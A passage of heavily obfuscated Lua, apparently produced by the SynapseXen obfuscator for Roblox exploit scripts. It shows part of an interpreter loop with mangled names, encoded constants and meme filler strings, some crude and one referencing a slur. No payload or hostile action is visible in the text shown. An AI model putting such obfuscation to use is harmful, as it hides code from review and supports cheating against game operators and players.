SynapseXen_lIlIlIlliliiIIlilII=SynapseXen_lilllillilllIilIIlII[SynapseXen_lIIIllIiiIIlil]if SynapseXen_lIlIlIlliliiIIlilII[2075702005]==(SynapseXen_ilIliiI[242770424]or(function(...)local SynapseXen_IiIil="inb4 posted on exploit reports section"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3152083060,1220192731)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1205154328,3089845234)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[242770424]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(924037804,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2330202424,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3789866299,3099052344,1241213637,3151307905,4028784340,2959950049,2153743769,2424504204,2129821080,145902181}return SynapseXen_ilIliiI[242770424]end)(1070,12134,{},7853,10900))then SynapseXen_lllIIIIIllilii[SynapseXen_IiliiliIiiIiiIliIlI-1]={SynapseXen_llIlIliI,SynapseXen_IiilillliiIi(SynapseXen_lIlIlIlliliiIIlilII[1402414475],SynapseXen_ilIliiI[3456403767]or(function(...)local SynapseXen_IiIil="HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1879467461,2975477903)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4029074198,265865692)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3456403767]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1319692127,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3243817728,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3754604157,1991979527,424502095,16032676,3150318146,3051556100,2437036156}return SynapseXen_ilIliiI[3456403767]end)({},{}))}elseif SynapseXen_lIlIlIlliliiIIlilII[2075702005]==(SynapseXen_ilIliiI[3869754981]or(function()local SynapseXen_IiIil="what are you trying to say? that fucking one dot + dot + dot + many dots is not adding adding 1 dot + dot and then adding all the dots together????"SynapseXen_ilIliiI[3869754981]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3950091599,3952497152),SynapseXen_IiilillliiIi(1803251471,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{3504261387,2959869730,1081625974,2363452620,2226963469,4276616594,879292666}return SynapseXen_ilIliiI[3869754981]end)())then SynapseXen_lllIIIIIllilii[SynapseXen_IiliiliIiiIiiIliIlI-1]={SynapseXen_lIiiIIlIlIllIIiIil,SynapseXen_IiilillliiIi(SynapseXen_lIlIlIlliliiIIlilII[1402414475],SynapseXen_ilIliiI[344199069]or(function(...)local SynapseXen_IiIil="hi devforum"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3615352966,1460889529)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3926523022,368429676)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[344199069]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2063091651,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3023725269,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{964050059,2677284145}return SynapseXen_ilIliiI[344199069]end)({},1985,1536,"IiIIIlIll"))}end;SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end;SynapseXen_lIiIlIliillllIi[#SynapseXen_lIiIlIliillllIi+1]=SynapseXen_lllIIIIIllilii end;SynapseXen_llIlIliI[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[4274845403]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1364070847,3766197869)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2767565870,1527426330)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4274845403]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(252494540,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4036363878,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2351706339,1088107863,3048621917,861046299,451657701,95269082,920960683}return SynapseXen_ilIliiI[4274845403]end)(4812,"iIiIIiIIlIiIlIIi",{},{},7326),256)]=SynapseXen_liilIIiiiIiIlii(SynapseXen_IIiIIll,SynapseXen_llIll,SynapseXen_liiIllIiii)elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1258748049]or(function()local SynapseXen_IiIil="baby i just fell for uwu,,,,,, i wanna be with uwu!11!!"SynapseXen_ilIliiI[1258748049]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3771656275,868317789),SynapseXen_IiilillliiIi(2644708013,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{874770262,630945288,926766837}return SynapseXen_ilIliiI[1258748049]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1240962675]or(function()local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"SynapseXen_ilIliiI[1240962675]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(524606692,531647477),SynapseXen_IiilillliiIi(1314417081,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3408412178,2428226156,1226427377,1620421005,3006260537,1379317871}return SynapseXen_ilIliiI[1240962675]end)(),256)local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2215242418]or(function(...)local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(689630929,1831401016)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1653421152,2641572109)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2215242418]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3621368816,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1483221852,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2833581110,835811667,2936035900,3886424783}return SynapseXen_ilIliiI[2215242418]end)("IiiIlIIliIllIIIliiI",6745,"iiiillIIl",11881,"lilIlll",3156,14565),512)local SynapseXen_llIlIliI,SynapseXen_illlill=SynapseXen_lIiil,SynapseXen_lIiliiIiIIiIil;SynapseXen_llllIilliIllilII=SynapseXen_liIilIlIllIill-1;for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_liIilIlIllIill,SynapseXen_liIilIlIllIill+(SynapseXen_IiIiilIIliIIlliI>0 and SynapseXen_IiIiilIIliIIlliI-1 or SynapseXen_IllIlIIiiliiiliiiIIi)do SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_illlill[SynapseXen_IiliiliIiiIiiIliIlI-SynapseXen_liIilIlIllIill]end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1421581441]or(function(...)local SynapseXen_IiIil="skisploit is the superior obfuscator, clearly."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2468231278,3285657202)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3713118115,581871902)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1421581441]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2715296231,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3216913595,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3418924604,2777479621,1011345559,25257896,3089149317,3372614865,1189472727,111475105}return SynapseXen_ilIliiI[1421581441]end)({}))then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[145728382]or(function(...)local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2547816617,1802350727)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2767116177,1527826004)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[145728382]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2670343509,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(758445263,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{4129767295,453511002,1688287614,3288807208}return SynapseXen_ilIliiI[145728382]end)("lIIl","lIl"),512),SynapseXen_iIIlIiiIiiiIIIi,512)local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[3797111921]or(function(...)local SynapseXen_IiIil="inb4 posted on exploit reports section"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(148156656,3229960469)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2229916716,2065085062)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3797111921]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4007484508,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(770608205,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{1577752033,3228661776,3299688265,1233074483,187239739}return SynapseXen_ilIliiI[3797111921]end)({},{},"iIiiilIiiiI",{},13378,9510),512),SynapseXen_iIIlIiiIiiiIIIi,512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[138598409]or(function()local SynapseXen_IiIil="wally bad bird"SynapseXen_ilIliiI[138598409]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1014526374,3244241756),SynapseXen_IiilillliiIi(3479108745,SynapseXen_IllIiIili[1]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3482076099,3832592161,4243666486,214571267,3550366920,2602307704,3036008699}return SynapseXen_ilIliiI[138598409]end)(),256)]=SynapseXen_IiIiilIIliIIlliI^SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[739025635]or(function()local SynapseXen_IiIil="i put more time into this shitty list of dead memes then i did into the obfuscator itself"SynapseXen_ilIliiI[739025635]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(244116939,806139598),SynapseXen_IiilillliiIi(1882115399,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2686588078,3246627365,303923969}return SynapseXen_ilIliiI[739025635]end)())then local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[2676871095]or(function(...)local SynapseXen_IiIil="now with shitty xor string obfuscation"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(279064320,860634981)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1927261518,2367724538)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2676871095]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3630313898,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(117954551,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{4106199927,3359230675,1274171720,69865709}return SynapseXen_ilIliiI[2676871095]end)("llliIliIIiIII",5166,"illiiIllIIiiilllll","i",4077,10131))local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_IiilillliiIi(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[841151208]or(function(...)local SynapseXen_IiIil="can we have an f in chat for ripull"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3061383657,138165512)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1045371552,3249606803)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[841151208]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1527521516,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2396751649,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{1690098691,161887376,3002442838,2508632219,1545019958,1832040743,3368843871,712042256}return SynapseXen_ilIliiI[841151208]end)(8639),256),SynapseXen_iIIlIiiIiiiIIIi)]=SynapseXen_llIlIliI[SynapseXen_IiilillliiIi(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[818298267]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3919754284,667063805)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(478575319,3816381729)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[818298267]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2430073438,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(270199456,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{495606355,1928334139,2774637954,962651513,2406548403,1971082653,3384983764}return SynapseXen_ilIliiI[818298267]end)("iliIIIiIl",{},{},{},{},"IIIiiilliIliiI",{},2798),512),SynapseXen_iIIlIiiIiiiIIIi)][SynapseXen_llIlillliIl]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[3232064960]or(function(...)local SynapseXen_IiIil="epic gamer vision"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4165751601,3342466190)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1233661116,3061328853)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3232064960]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3049582834,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1093891094,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{4122697454,3808544793,3708653228,783978545,3965271356,1249708307}return SynapseXen_ilIliiI[3232064960]end)("iIiIlilIIiliII",4538,10360,"IIiIi",8448,{},{},"lI",5529,{}))then local SynapseXen_liIilIlIllIill=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2142125624]or(function()local SynapseXen_IiIil="double-header fair! this rationalization has a overenthusiastically anticheat! you will get nonpermissible for exploiting!"SynapseXen_ilIliiI[2142125624]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(299221591,1828295674),SynapseXen_IiilillliiIi(2175105090,SynapseXen_IllIiIili[8]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{343536414,3161639171,711079424,638101085,2251172812,1659445021,1814629755,4110822512,1918001416,959366881}return SynapseXen_ilIliiI[2142125624]end)())local SynapseXen_IlliilIIli={}for SynapseXen_IiliiliIiiIiiIliIlI=1,#SynapseXen_lIiIlIliillllIi do local SynapseXen_lliiliI=SynapseXen_lIiIlIliillllIi[SynapseXen_IiliiliIiiIiiIliIlI]for SynapseXen_lIiIIIIlllIilI=0,#SynapseXen_lliiliI do local SynapseXen_iIliIIIlIliillliii=SynapseXen_lliiliI[SynapseXen_lIiIIIIlllIilI]local SynapseXen_llIlIliI=SynapseXen_iIliIIIlIliillliii[1]local SynapseXen_liillIIlliiiIIl=SynapseXen_iIliIIIlIliillliii[2]if SynapseXen_llIlIliI==SynapseXen_lIiil and SynapseXen_liillIIlliiiIIl>=SynapseXen_liIilIlIllIill then SynapseXen_IlliilIIli[SynapseXen_liillIIlliiiIIl]=SynapseXen_llIlIliI[SynapseXen_liillIIlliiiIIl]SynapseXen_iIliIIIlIliillliii[1]=SynapseXen_IlliilIIli end end end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[979795998]or(function()local SynapseXen_IiIil="yed"SynapseXen_ilIliiI[979795998]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(398858312,4216395951),SynapseXen_IiilillliiIi(2721691936,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3949266914,401754594,3164774744,1406729473,661060643,3995844427,608586469,4019858367}return SynapseXen_ilIliiI[979795998]end)())then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2799424647]or(function()local SynapseXen_IiIil="what are you trying to say? that fucking one dot + dot + dot + many dots is not adding adding 1 dot + dot and then adding all the dots together????"SynapseXen_ilIliiI[2799424647]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3253953824,2744030812),SynapseXen_IiilillliiIi(751989599,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3017487195,337674584,1681569405,1935044018,2762536087}return SynapseXen_ilIliiI[2799424647]end)()),SynapseXen_iIIlIiiIiiiIIIi)local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[1238265677]or(function(...)local SynapseXen_IiIil="my way to go against expwoiting is to have safety measuwes. i 1 wocawscwipt and onwy moduwes. hewe's how it wowks: this scwipt bewow stowes the moduwes in a tabwe fow each moduwe we send the wist with the moduwes and moduwe infowmation and use inyit a function in my moduwe that wiww stowe the info and aftew it has send to aww the moduwes it wiww dewete them. so whenyevew the cwient twies to hack they cant get the moduwes. onwy this peace of wocawscwipt."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2191700349,209958912)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1442765635,2852233188)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1238265677]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(393880645,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3622840644,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2270646579,341020258,1383972002,3641992108,1407353608,279099956,2604702935,364091733,1848634396,2386858880}return SynapseXen_ilIliiI[1238265677]end)("iliIIiiiIllIIIi","lillIiiIIilIIIIiIl","IlliiIilIiIiIiiIl"),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[254454874]or(function()local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"SynapseXen_ilIliiI[254454874]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1998737687,3991489046),SynapseXen_IiilillliiIi(4049539439,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{1415084362,987018351}return SynapseXen_ilIliiI[254454874]end)(),256)]=SynapseXen_IiIiilIIliIIlliI+SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[4070694624]or(function()local SynapseXen_IiIil="HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP"SynapseXen_ilIliiI[4070694624]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4121490827,667076023),SynapseXen_IiilillliiIi(2629874167,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1647383481,1471633429,808956877,2334020355,3529997453}return SynapseXen_ilIliiI[4070694624]end)())then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[1377560976]or(function(...)local SynapseXen_IiIil="xen best rerubi paste"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2293549849,65191721)local 